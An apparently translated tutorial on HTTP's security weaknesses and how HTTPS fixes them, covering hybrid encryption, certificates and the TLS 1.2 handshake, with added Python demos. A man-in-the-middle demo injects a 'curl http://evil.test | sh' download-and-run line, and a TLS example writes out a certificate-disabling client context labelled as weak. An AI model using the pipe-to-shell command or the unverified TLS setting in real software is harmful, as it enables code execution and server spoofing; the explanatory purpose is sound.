Part One: Disadvantages of HTTP
Before getting to HTTPS, a word on HTTP's weaknesses. HTTP is simple and convenient, but it has the following main shortcomings:
Communication is in plaintext (not encrypted), so its content can be eavesdropped on
The identity of the communicating party is not verified, so spoofing is possible
Message integrity cannot be proven, so messages may have been tampered with in transit
Other unencrypted protocols share the same problems
Specific Web servers and Web browsers have their own security vulnerabilities (a separate matter from the protocol itself)
1. Communication uses plaintext and can be eavesdropped on
HTTP itself has no encryption capability, so it cannot encrypt the communication as a whole (the requests and responses exchanged over HTTP). HTTP messages are transmitted in plaintext, that is, unencrypted.
Because of the way the TCP/IP protocol family works, the content of a communication can be intercepted anywhere along the path: anyone who can capture packets on a link the traffic crosses can read it.
Countermeasure: encrypt the communication to prevent eavesdropping
What can be encrypted:
①. Encrypting the communication channel
HTTP has no encryption mechanism of its own, but it can be combined with SSL (Secure Sockets Layer) or TLS (Transport Layer Security) to encrypt the content of the HTTP communication. This combination is what is commonly called HTTPS (HTTP Secure, i.e. HTTP over SSL/TLS).
②. Encrypting the content itself
HTTP also has no mechanism for encrypting the transmitted content itself, that is, the message body. The client can encrypt the body before sending it, but only if the client and server share an encryption and decryption mechanism; this approach is mainly used in Web services. Encrypting only the body still leaves the message exposed to tampering, since the headers remain in the clear and nothing guarantees integrity.
2. The identity of the communicating party is not verified, so spoofing is possible
Requests and responses in HTTP do not confirm who the communicating party is. There is no way to check whether the server is really the host designated by the URI of the request, or whether the response is really being returned to the client that sent the request.
Anyone can send a request, and the server returns a response to every request it receives (unless the Web server is configured to restrict the sender's IP address or port).
This weakness of HTTP has the following consequences:
①. It cannot be determined whether the Web server the request reaches is the server the client actually intended to reach; it may be a spoofed server
②. It cannot be determined whether the client that receives the response is the client that actually sent the request; it may be a spoofed client
③. It cannot be determined whether the other party is authorized to communicate, even though some Web servers hold important information that only specific users should be allowed to access
④. It cannot be determined where a request came from
⑤. Even meaningless requests are accepted, so a flood of requests (a DoS attack, Denial of Service) cannot be blocked
3. Message integrity cannot be proven, so messages may have been tampered with
Integrity refers to the accuracy and completeness of information. If integrity cannot be proven, there is no way to know whether the information received is the information that was sent.
HTTP cannot prove the integrity of the messages it carries, so neither side can tell whether a request or response was modified in transit. An attack in which the attacker intercepts a request or response on its way and alters it is called a man-in-the-middle attack (MITM).
Preventing tampering: the commonly cited methods are verifying hash values such as MD5 and SHA-1 and verifying the file's digital signature. Two caveats: MD5 and SHA-1 are broken for collision resistance and SHA-256 or stronger should be used today; and a hash published next to the file only helps if the hash itself arrives over a channel the attacker cannot modify, because a man-in-the-middle who can replace the file can recompute and replace the hash too. Detecting tampering reliably needs a key the attacker does not have, either a keyed MAC or a digital signature.
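The following added example (not code from the original article) makes the caveat above concrete. It constructs a small "download", lets a man-in-the-middle replace it, and shows that an unkeyed SHA-256 hash is silently recomputed by the attacker while an HMAC-SHA256 tag under a key the attacker lacks catches the change. The shared key is an assumption of the example; in HTTPS it comes out of the handshake.

```python
"""Why a published hash does not stop a man-in-the-middle, and why a keyed
MAC does. Constructed example; the sample file and key are not real."""
import hashlib
import hmac
import secrets

# Constructed sample "download" and a key shared out of band between the two
# endpoints (assumption: in HTTPS this key is derived during the handshake).
ORIGINAL = b"#!/bin/sh\necho 'installing release 1.2.3'\n"
SHARED_KEY = secrets.token_bytes(32)


def publish_with_hash(content):
    """Server publishes the file plus its SHA-256 hex digest (no key involved)."""
    return content, hashlib.sha256(content).hexdigest()


def verify_hash(content, digest):
    return hmac.compare_digest(hashlib.sha256(content).hexdigest(), digest)


def publish_with_mac(content):
    """Server publishes the file plus an HMAC-SHA256 tag under the shared key."""
    return content, hmac.new(SHARED_KEY, content, hashlib.sha256).hexdigest()


def verify_mac(content, tag):
    expected = hmac.new(SHARED_KEY, content, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def mitm(content, attacker_key=None):
    """Attacker on the path swaps the body and recomputes the check value.
    Without SHARED_KEY the best it can do is a fresh hash, or a MAC under a
    key of its own choosing."""
    evil = content.replace(b"installing", b"curl http://evil.test | sh; installing")
    if attacker_key is None:
        return evil, hashlib.sha256(evil).hexdigest()
    return evil, hmac.new(attacker_key, evil, hashlib.sha256).hexdigest()


def hash_detects_tampering():
    """Returns False: the recomputed hash matches, so the swap goes unnoticed."""
    content, digest = publish_with_hash(ORIGINAL)
    evil, evil_digest = mitm(content)
    return not verify_hash(evil, evil_digest)


def mac_detects_tampering():
    """Returns True: a tag under the wrong key fails verification."""
    content, tag = publish_with_mac(ORIGINAL)
    evil, forged = mitm(content, attacker_key=secrets.token_bytes(32))
    return not verify_mac(evil, forged)
```

The same logic is why HTTPS carries a MAC (or an AEAD tag) keyed from the handshake on every record rather than a bare checksum.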
Part Two: HTTP + encryption + authentication + integrity protection = HTTPS
1. HTTP with encryption and authentication mechanisms added is called HTTPS (HTTP Secure). The certificate used by HTTPS can prove the identity of the server, and with client certificates the identity of the client as well.
2. HTTPS is HTTP wrapped in an SSL/TLS shell
HTTPS is not a new application-layer protocol. It is HTTP in which the part that talks to the transport is replaced by SSL (Secure Sockets Layer) or TLS (Transport Layer Security).
Normally HTTP talks directly to TCP. When SSL/TLS is used, HTTP talks to SSL/TLS, and SSL/TLS talks to TCP.
SSL/TLS is independent of HTTP; other application-layer protocols such as SMTP and Telnet can also run on top of it.
3. Encryption technology
SSL/TLS uses public-key cryptography (public-key encryption). The encryption algorithm is public; only the key is secret, and the security of the scheme rests entirely on keeping the key used to decrypt the encrypted content secret.
A method in which the same key is used both to encrypt and to decrypt is called shared-key encryption (common-key cryptosystem), also known as symmetric-key encryption. Its weak point is key distribution: the key has to reach the other party somehow, and if it is sent over the network it can be intercepted just like the data.
Public-key encryption:
Public-key encryption uses a pair of asymmetric keys, one called the private key and one called the public key.
Process: the sender encrypts with the recipient's public key; the recipient decrypts with its own private key. (Recovering the plaintext from the ciphertext and the public key alone is possible in theory but computationally infeasible in practice.)
HTTPS uses a hybrid encryption mechanism
HTTPS combines shared-key encryption and public-key encryption. Public-key encryption alone would solve the key-exchange problem, but it is much slower than shared-key encryption, so encrypting all traffic with it is impractical.
In practice the two are combined to use the strengths of each: public-key encryption is used in the key-exchange phase to deliver a shared key safely, and shared-key encryption is used for the message-exchange phase once the connection is established.
4. Certificates
Public-key certificates are issued by a digital certificate authority (CA, Certificate Authority) or a similar authority trusted by both client and server.
Because the CA sits in a position trusted by both parties, the process works as follows: the server operator submits its public key to the CA, the CA verifies the applicant and digitally signs the public key, and the signed public key is bound into a public-key certificate. The server then sends this certificate to the client when starting public-key-encrypted communication.
The client that receives the certificate verifies the digital signature on it using the CA's public key (which is pre-installed in the browser or operating system). If the signature checks out, the client has established two things:
①. The server's public key was certified by a genuine, trusted certificate authority
②. The server's public key can therefore be trusted
Roles of the certificate:
①. Prove that the server on the other end is the one named in the certificate
②. Verify that the organization behind the server really exists (certificates with this property are EV SSL certificates: Extended Validation SSL certificates; browsers used to display the address bar with a green background for them, though current browsers no longer show a distinct EV indicator)
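Certificate verification only protects against spoofing if the client actually performs it. The added example below (not code from the original article) uses Python's standard ssl module to put the weak client configuration frequently pasted into scripts, which accepts any certificate from any server, beside the corrected one, and an audit function that flags the settings a man-in-the-middle would exploit. The connection helper at the end needs network access and is not exercised offline; its host name is a placeholder.

```python
"""Client-side TLS context settings: the weak configuration that accepts a
spoofed server, beside the corrected one. Added example using the stdlib
ssl module; host names are placeholders."""
import socket
import ssl


def unverified_context():
    """Weak setting: the chain is not checked against any CA and the host
    name is not matched, so any server presenting any certificate is
    accepted. This is what 'verify=False' style workarounds amount to."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def verified_context(cafile=None):
    """Corrected setting: require a chain to a trusted CA (the system store,
    or the file given) and require the certificate to match the host name."""
    ctx = ssl.create_default_context(cafile=cafile)  # CERT_REQUIRED, check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2     # refuse SSLv3 / TLS 1.0 / TLS 1.1
    return ctx


def audit(ctx):
    """Return the list of problems that would let a spoofed server through."""
    problems = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        problems.append("certificate chain not verified (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        problems.append("host name not checked against the certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        problems.append("obsolete protocol versions allowed")
    return problems


def peer_certificate(host, ctx, port=443):
    """Connect and return the validated peer certificate. Needs network;
    with verified_context() a mismatched or untrusted certificate raises
    ssl.SSLCertVerificationError instead of silently connecting."""
    with socket.create_connection((host, port)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    print("weak:", audit(unverified_context()))
    print("fixed:", audit(verified_context()))
```

When reviewing code, search for `CERT_NONE`, `check_hostname = False`, or library equivalents such as `verify=False`; each one removes the spoofing protection this section describes.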
5. HTTPS secure communication mechanism
HTTPS communication flow (the RSA key-exchange handshake of SSL/TLS up to version 1.2; modern deployments use ephemeral Diffie-Hellman key exchange instead, and TLS 1.3 removed RSA key exchange entirely):
①. The client sends a ClientHello message to start the communication. It contains the protocol version the client supports and a list of the cipher suites (encryption components) it supports.
②. When the server receives the message, it replies with a ServerHello message containing the protocol version and the cipher suite to use (the suite is chosen from the list the client offered).
The server then sends a Certificate message containing its public-key certificate.
Finally the server sends a ServerHelloDone message to tell the client that the first phase of the SSL/TLS handshake is finished.
③. After the first phase ends, the client responds with a ClientKeyExchange message. It contains a random string called the Pre-master Secret that is used to derive the keys for encrypting the communication; it is encrypted with the server's public key taken from the certificate received in step ②, so only the holder of the matching private key can read it.
The client then sends a ChangeCipherSpec message, which tells the server that everything after this message is encrypted with the keys derived from the Pre-master Secret.
Finally the client sends a Finished message. It contains a check value computed over all handshake messages exchanged so far; the handshake succeeds only if the server can decrypt this message and the check value matches its own view of the handshake.
④. The server likewise sends a ChangeCipherSpec message,
followed by its own Finished message.
⑤. Once the client and server have exchanged Finished messages, the SSL/TLS connection is established and the communication is protected from here on.
⑥. The application-layer protocol starts communicating, that is, the HTTP request is sent.
⑦. Finally the connection is closed by the client, which sends a close_notify alert and then a TCP FIN to close the TCP connection.
In the flow above, application-layer data is sent together with a MAC (Message Authentication Code). The MAC lets the receiver detect whether the message was tampered with, protecting its integrity.
Communication flowchart (the process by which the server presents its public-key certificate to establish HTTPS)
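The handshake above, as an added example that is not part of the original article: a simulation of both sides of the RSA key-exchange handshake and of the MAC-protected record layer, in stdlib Python. Everything cryptographic in it is a stand-in labelled as such: the server key is textbook, unpadded RSA built from two Mersenne primes (M521 and M127), the key schedule is plain HMAC-SHA256 instead of the TLS PRF, and the "cipher" is an HMAC keystream. None of that is secure; what it shows is the message flow, why the Pre-master Secret must be encrypted to the server's public key, how the Finished check value catches a modified handshake, and how the record MAC catches a modified record.

```python
"""Simulation of the SSL/TLS (<= 1.2) RSA-key-exchange handshake, both sides.
Toy primitives only: they show the message flow, not real TLS cryptography."""
import hashlib
import hmac
import secrets

# Toy server key from two Mersenne primes. Real servers use a 2048-bit-or-larger
# key with PKCS#1 padding; this is unpadded textbook RSA, for illustration only.
P, Q, E = (1 << 521) - 1, (1 << 127) - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
SERVER_PUB, SERVER_PRIV = (N, E), (N, D)
N_BYTES = (N.bit_length() + 7) // 8
PREMASTER_LEN = 48            # the TLS pre-master secret is 48 bytes


def rsa_encrypt(pub, msg):
    n, e = pub
    return pow(int.from_bytes(msg, "big"), e, n)


def rsa_decrypt(priv, ct, length):
    n, d = priv
    return pow(ct, d, n).to_bytes(length, "big")


def derive(secret, label, seed, length=32):
    """HMAC-SHA256 standing in for the TLS PRF (length <= 32 here)."""
    return hmac.new(secret, label + seed, hashlib.sha256).digest()[:length]


def xor_stream(key, seq, data):
    """Toy stream cipher: XOR with an HMAC counter-mode keystream."""
    stream = b""
    for block in range((len(data) + 31) // 32):
        stream += hmac.new(key, seq.to_bytes(8, "big") + block.to_bytes(4, "big"),
                           hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(data, stream))


def protect(keys, seq, plaintext):
    """Record layer: encrypt, then MAC over sequence number + ciphertext."""
    enc_key, mac_key = keys
    ct = xor_stream(enc_key, seq, plaintext)
    return ct + hmac.new(mac_key, seq.to_bytes(8, "big") + ct, hashlib.sha256).digest()


def unprotect(keys, seq, record):
    enc_key, mac_key = keys
    ct, tag = record[:-32], record[-32:]
    expected = hmac.new(mac_key, seq.to_bytes(8, "big") + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad_record_mac: record tampered with, replayed or wrong key")
    return xor_stream(enc_key, seq, ct)


def record_is_valid(keys, seq, record):
    try:
        unprotect(keys, seq, record)
        return True
    except ValueError:
        return False


def handshake(client_suites, server_suites):
    """Run both sides; return (chosen suite, client keys, server keys)."""
    transcript = []                       # every handshake message, in order
    # (1) ClientHello: version, supported suites and a client random
    client_random = secrets.token_bytes(32)
    transcript.append(b"ClientHello:TLSv1.2:" + client_random + ",".join(client_suites).encode())
    # (2) ServerHello picks one suite from the client's list; then Certificate
    #     (carrying the public key) and ServerHelloDone
    chosen = next((s for s in client_suites if s in server_suites), None)
    if chosen is None:
        raise ValueError("handshake_failure: no cipher suite in common")
    server_random = secrets.token_bytes(32)
    transcript.append(b"ServerHello:" + server_random + chosen.encode())
    transcript.append(b"Certificate:" + repr(SERVER_PUB).encode())
    transcript.append(b"ServerHelloDone")
    # (3) ClientKeyExchange: pre-master secret encrypted under the server's public key
    premaster = secrets.token_bytes(PREMASTER_LEN)
    cke = rsa_encrypt(SERVER_PUB, premaster)
    transcript.append(b"ClientKeyExchange:" + cke.to_bytes(N_BYTES, "big"))
    server_premaster = rsa_decrypt(SERVER_PRIV, cke, PREMASTER_LEN)  # private key only

    def key_block(pm):                    # both sides run the same derivation
        master = derive(pm, b"master secret", client_random + server_random)
        return master, (derive(master, b"write key", server_random + client_random),
                        derive(master, b"mac key", server_random + client_random))

    client_master, client_keys = key_block(premaster)
    server_master, server_keys = key_block(server_premaster)
    # ChangeCipherSpec, then Finished = PRF over the hash of everything so far;
    # if a MITM altered any earlier message the two sides' hashes differ.
    th = hashlib.sha256(b"".join(transcript)).digest()
    client_finished = derive(client_master, b"client finished", th, 12)
    if not hmac.compare_digest(client_finished, derive(server_master, b"client finished", th, 12)):
        raise ValueError("decrypt_error: client Finished does not verify")
    transcript.append(b"Finished:" + client_finished)
    th = hashlib.sha256(b"".join(transcript)).digest()
    server_finished = derive(server_master, b"server finished", th, 12)
    if not hmac.compare_digest(server_finished, derive(client_master, b"server finished", th, 12)):
        raise ValueError("decrypt_error: server Finished does not verify")
    return chosen, client_keys, server_keys
```

Usage: `suite, ck, sk = handshake(["TLS_RSA_WITH_AES_128_GCM_SHA256"], ["TLS_RSA_WITH_AES_128_GCM_SHA256"])` followed by `unprotect(sk, 1, protect(ck, 1, b"GET / HTTP/1.1\r\n\r\n"))`. Flipping a byte of a record, or presenting it under a different sequence number, makes `unprotect` fail with `bad_record_mac`, which is the record-level integrity protection the MAC sentence above refers to. The example also shows the weakness that led TLS 1.3 to drop this exchange: anyone who later obtains the server's private key can decrypt the recorded ClientKeyExchange and hence every session.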
HTTPS uses the SSL (Secure Sockets Layer) and TLS (Transport Layer Security) protocols.
Drawback: processing is slower when SSL/TLS is used
①. Slower communication: the handshake adds round trips and the record layer adds traffic, so compared with plain HTTP the communication can be 2 to 100 times slower
②. Encryption processing: both the server and the client must encrypt and decrypt every message, consuming more CPU and memory on both sides and increasing the load
Improvement: use an SSL accelerator (a dedicated server or hardware module) to handle the SSL/TLS computation. It can speed up the SSL/TLS processing several times over; it takes on only the SSL/TLS work, thereby offloading that share of the load from the Web server
HTTP protocol (11): HTTP vs. HTTPS